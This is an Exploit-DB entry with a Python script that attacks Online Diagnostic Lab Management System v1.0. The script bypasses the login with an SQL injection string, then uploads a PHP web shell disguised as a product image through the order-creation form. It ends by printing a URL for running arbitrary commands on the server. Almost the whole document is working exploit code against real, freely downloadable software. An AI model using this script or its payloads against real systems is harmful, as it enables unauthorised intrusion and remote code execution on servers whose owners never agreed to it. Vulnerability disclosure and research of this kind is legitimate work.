Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

EDB-ID:

51045

CVE:

N/A




Platform:

PHP

Date:

2023-03-25


# Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: N/A
# Date: 2022-9-23
# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
# Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
# Tested on: windows 11 - XAMPP
# Version: 1.0
# Authentication Required: bypass login with sql injection

#/usr/bin/python3

import requests
import os
import sys
import time
import random

# clean screen
os.system("cls")
os.system("clear")

logo = '''
##################################################################
#                                                                                                                                            #
#    Exploit Script ( Online Diagnostic Lab Management System )                             #
#                                                                                                                                            #
##################################################################
'''
print(logo)

url = str(input("Enter website url : "))
username = ("' OR 1=1-- -")
password = ("test")

req = requests.Session()

target = url+"/diagnostic/login.php"
data = {'username':username,'password':password}

website = req.post(target,data=data)
files = open("rev.php","w")
payload = "<?php system($_GET['cmd']);?>"
files.write(payload)
files.close()

hash = random.getrandbits(128)
name_file = str(hash)+".php"
if "Login Successfully" in website.text:

    print("[+] Login Successfully")
    website_1 = url+"/diagnostic/php_action/createOrder.php"

    upload_file = {
        "orderDate": (None,""),
        "clientName": (None,""),
        "clientContact" : (None,""),
        "productName[]" : (None,""),
        "rateValue[]" : (None,""),
        "quantity[]" : (None,""),
        "totalValue[]" : (None,""),
        "subTotalValue" : (None,""),
        "totalAmountValue" : (None,""),
        "discount" : (None,""),
        "grandTotalValue" : (None,""),
        "gstn" : (None,""),
        "vatValue" : (None,""),
        "paid" : (None,""),
        "dueValue" : (None,""),
        "paymentType" : (None,""),
        "paymentStatus" : (None,""),
        "paymentPlace" : (None,""),
        "productImage" : (name_file,open("rev.php","rb"))
        }

    up = req.post(website_1,files=upload_file)
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
else:
    print("[-] Check username or password")